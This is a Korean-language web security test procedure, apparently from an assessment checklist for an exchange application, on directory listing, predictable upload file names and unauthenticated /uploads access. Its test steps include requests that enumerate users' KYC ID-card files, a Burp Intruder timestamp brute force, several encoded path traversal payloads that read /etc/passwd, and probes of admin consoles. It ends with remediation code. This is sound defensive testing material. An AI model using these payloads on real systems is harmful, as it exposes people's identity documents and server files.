================================================================================
[VCE-EX-24] 파일 목록화 가능성
도메인: exchange
위험도: Medium
================================================================================

1. 진단 항목 개요
--------------------------------------------------------------------------------
웹 서버의 디렉토리 인덱싱(Directory Listing/Indexing) 기능이 활성화되어 있거나,
업로드 파일 경로 패턴 예측을 통해 다른 사용자의 업로드 파일에 접근할 수 있는지
검증한다.

SecurityConfig.java:72에서 /uploads/** 경로가 permitAll()로 설정되어 있는 것으로
확인된다. 이 경우 디렉토리 리스팅이 활성화되어 있다면 전체 업로드 파일 목록을
인증 없이 조회할 수 있다.

위험도가 Medium인 이유:
- KYC 신분증 사진 등 개인정보 파일이 업로드 경로에 있을 경우 High로 상승
- 파일명 패턴 예측으로 타 사용자 파일 접근 가능
- 내부 파일 구조 노출로 추가 공격의 발판


2. 대상 기능 & 엔드포인트
--------------------------------------------------------------------------------
  - GET /uploads/                      (업로드 디렉토리 루트)
  - GET /uploads/profile/              (프로필 이미지 디렉토리)
  - GET /uploads/kyc/                  (KYC 문서 디렉토리)
  - GET /uploads/documents/            (일반 문서 디렉토리)
  - GET /static/                       (정적 파일 디렉토리)
  - GET /resources/                    (리소스 디렉토리)
  - GET /public/                       (공개 파일 디렉토리)
  - GET /assets/                       (프론트엔드 자산 디렉토리)

SecurityConfig.java:72:
  .antMatchers("/uploads/**").permitAll()
  → 인증 없이 /uploads/** 접근 허용


3. 취약점 원리 (Why this works)
--------------------------------------------------------------------------------
[디렉토리 인덱싱 활성화]
Nginx의 autoindex on; 또는 Apache의 Options +Indexes 설정 시,
디렉토리에 index.html이 없으면 서버가 디렉토리 내 파일 목록을 HTML로 반환.
공격자는 이를 통해 전체 파일 목록을 획득 가능.

[업로드 파일명 예측]
업로드 시 파일명을 원본 파일명 그대로 사용하거나, 타임스탬프/순차 ID 기반으로
생성하는 경우 공격자가 파일명 패턴을 예측하여 다른 사용자의 파일에 직접 접근.

예측 가능한 파일명 패턴:
  - /uploads/profile/1.jpg       (userId 순번)
  - /uploads/profile/2.jpg
  - /uploads/kyc/2024111512300001.jpg  (타임스탬프)
  - /uploads/kyc/1_id_card.jpg   (userId + 문서 유형)

[경로 순회(Path Traversal) 결합]
/uploads/../../../etc/passwd 형태로 업로드 디렉토리를 벗어나 서버 내부
파일에 접근 시도 (디렉토리 리스팅과 별개의 경로 순회 취약점).

[SecurityConfig.java permitAll 설정]
업로드 경로가 인증 없이 접근 가능하므로, 파일명만 알면 누구나 접근 가능.
신분증 사진, 계좌 사본 등 KYC 문서가 해당 경로에 저장된 경우 개인정보 유출.


4. 테스트 절차 (Step-by-step)
--------------------------------------------------------------------------------

[STEP 1] 업로드 디렉토리 직접 접근

1-1. 인증 없이 업로드 디렉토리 접근:
----------
GET /uploads/ HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/ HTTP/1.1
Host: vceapp.com
----------

응답 확인:
  - 200 OK + HTML 디렉토리 목록: "Index of /uploads/" → 취약
  - 200 OK + JSON 파일 목록              → 취약
  - 403 Forbidden                        → 안전
  - 404 Not Found                        → 안전

1-2. 하위 디렉토리 탐색:
----------
GET /uploads/profile/ HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/kyc/ HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/documents/ HTTP/1.1
Host: localhost:8080
----------


[STEP 2] 추측 가능한 파일명 직접 접근

2-1. 사용자 ID 기반 파일명:
----------
GET /uploads/profile/1.jpg HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/profile/2.jpg HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/profile/1.png HTTP/1.1
Host: localhost:8080
----------

2-2. KYC 문서 추측:
----------
GET /uploads/kyc/1_id_card.jpg HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/kyc/2_passport.jpg HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/kyc/2024111512300001.jpg HTTP/1.1
Host: localhost:8080
----------

2-3. 타임스탬프 기반 파일명 자동화 (Burp Intruder):
----------
GET /uploads/kyc/§timestamp§.jpg HTTP/1.1
Host: localhost:8080
----------

페이로드: 타임스탬프 범위
  20241101000000.jpg ~ 20241231235959.jpg (분 단위 Intruder)


[STEP 3] 정적 파일 경로 탐색

----------
GET /static/ HTTP/1.1
Host: localhost:8080
----------

----------
GET /resources/ HTTP/1.1
Host: localhost:8080
----------

----------
GET /WEB-INF/ HTTP/1.1
Host: localhost:8080
----------

----------
GET /META-INF/ HTTP/1.1
Host: localhost:8080
----------

----------
GET /.well-known/ HTTP/1.1
Host: localhost:8080
----------


[STEP 4] 경로 순회 시도

4-1. 업로드 경로에서 상위 디렉토리 접근:
----------
GET /uploads/../etc/passwd HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/../../../../etc/passwd HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/....//....//etc/passwd HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/..%c0%af..%c0%afetc%c0%afpasswd HTTP/1.1
Host: localhost:8080
----------

4-2. Windows 경로 구분자:
----------
GET /uploads/..\..\..\..\Windows\System32\drivers\etc\hosts HTTP/1.1
Host: localhost:8080
----------


[STEP 5] Nginx/Tomcat 기본 경로 접근

5-1. Nginx 기본 경로:
----------
GET /nginx-status HTTP/1.1
Host: localhost:8080
----------

----------
GET /stub_status HTTP/1.1
Host: localhost:8080
----------

5-2. Tomcat 관리 경로:
----------
GET /manager/ HTTP/1.1
Host: localhost:8080
----------

----------
GET /manager/html HTTP/1.1
Host: localhost:8080
----------

----------
GET /host-manager/ HTTP/1.1
Host: localhost:8080
----------

----------
GET /manager/status HTTP/1.1
Host: localhost:8080
----------

5-3. 기타 알려진 경로:
----------
GET /console HTTP/1.1
Host: localhost:8080
----------

----------
GET /h2-console HTTP/1.1
Host: localhost:8080
----------

----------
GET /swagger-ui.html HTTP/1.1
Host: localhost:8080
----------

----------
GET /v3/api-docs HTTP/1.1
Host: localhost:8080
----------


[STEP 6] 파일 확장자 변환 시도

업로드된 파일의 실제 확장자 확인 (이미지 업로드 후 확장자 변경):
----------
GET /uploads/profile/1.php HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/profile/1.jsp HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/profile/1.aspx HTTP/1.1
Host: localhost:8080
----------

----------
GET /uploads/profile/1.txt HTTP/1.1
Host: localhost:8080
----------


[STEP 7] Burp Suite Spider로 파일 탐색

Burp Suite → Target → Site Map에서:
  1. http://localhost:8080 우클릭 → Spider this host
  2. Filter → Response size > 0, Status Code = 200
  3. /uploads/ 하위 발견된 파일 목록 확인

Burp Suite Content Discovery:
  Target → Engagement tools → Discover content
  → 알려진 파일/디렉토리 이름으로 자동 탐색


5. 취약 여부 판단 기준
--------------------------------------------------------------------------------

취약 (Vulnerable):
  - /uploads/ 접근 시 디렉토리 목록(HTML/JSON)이 반환됨
  - 인증 없이 다른 사용자의 업로드 파일에 직접 접근 가능
  - 경로 순회 공격으로 /etc/passwd 등 서버 파일 접근 가능
  - /h2-console, /manager/ 등 관리 페이지가 인증 없이 접근 가능
  - /uploads/ 하위 KYC 문서가 파일명 예측으로 접근 가능

안전 (Safe):
  - /uploads/ 접근 시 403 또는 404 반환
  - 업로드 파일명이 UUID 등 랜덤 문자열로 생성 (예측 불가)
  - 파일 접근 시 인증된 사용자의 본인 파일만 접근 가능하도록 검증
  - 경로 순회 시도 시 400 또는 404 반환 (정규화 처리)
  - Tomcat 관리 경로가 외부에서 차단됨


6. 예상 취약 포인트 (코드 위치)
--------------------------------------------------------------------------------

[SecurityConfig.java:72]
  .antMatchers("/uploads/**").permitAll()
  // 업로드 경로에 인증 없이 접근 허용
  // 파일 소유자 검증 로직 부재

[FileUploadService.java]
  // 원본 파일명 그대로 사용하는 경우
  String fileName = originalFilename;  // 취약
  // 또는 타임스탬프 기반
  String fileName = System.currentTimeMillis() + "_" + originalFilename;  // 예측 가능

[Nginx 설정 (nginx.conf)]
  location /uploads/ {
      autoindex on;  // 디렉토리 인덱싱 활성화 → 취약
  }

[application.properties]
  spring.web.resources.static-locations=classpath:/static/,file:./uploads/
  // 업로드 폴더가 정적 리소스 경로에 포함된 경우


7. 권고 조치
--------------------------------------------------------------------------------

[디렉토리 인덱싱 비활성화]
1. Nginx 설정:
   location /uploads/ {
       autoindex off;   # 기본값이지만 명시적으로 off
       deny all;        # 직접 접근 완전 차단
   }

2. Spring Boot에서 /uploads/ 직접 서빙 제거:
   업로드 파일을 정적 리소스 경로가 아닌 서비스 제어 하에 서빙

[파일 접근 제어]
3. 파일 다운로드 API를 통해서만 접근 허용 (파일 소유자 검증):
   @GetMapping("/api/files/{fileId}")
   @PreAuthorize("isAuthenticated()")
   public ResponseEntity<Resource> downloadFile(@PathVariable Long fileId, Principal principal) {
       FileEntity file = fileService.findById(fileId);
       if (!file.getOwner().getEmail().equals(principal.getName())) {
           throw new AccessDeniedException("파일에 접근할 권한이 없습니다.");
       }
       return ResponseEntity.ok().body(new FileSystemResource(file.getPath()));
   }

4. SecurityConfig.java에서 /uploads/** 직접 접근 차단:
   .antMatchers("/uploads/**").denyAll()

[파일명 랜덤화]
5. 업로드 시 UUID로 파일명 생성:
   String savedFileName = UUID.randomUUID().toString() + "." + extension;
   // 원본 파일명은 DB에 별도 저장, URL에는 UUID만 사용

[경로 순회 방지]
6. 업로드 경로 정규화 및 검증:
   Path uploadPath = Paths.get(uploadDir).toAbsolutePath().normalize();
   Path targetPath = uploadPath.resolve(fileName).normalize();
   if (!targetPath.startsWith(uploadPath)) {
       throw new SecurityException("잘못된 파일 경로입니다.");
   }

[관리 페이지 차단]
7. Nginx에서 관리 경로 차단:
   location ~ ^/(manager|host-manager|h2-console) {
       allow 127.0.0.1;
       deny all;
   }
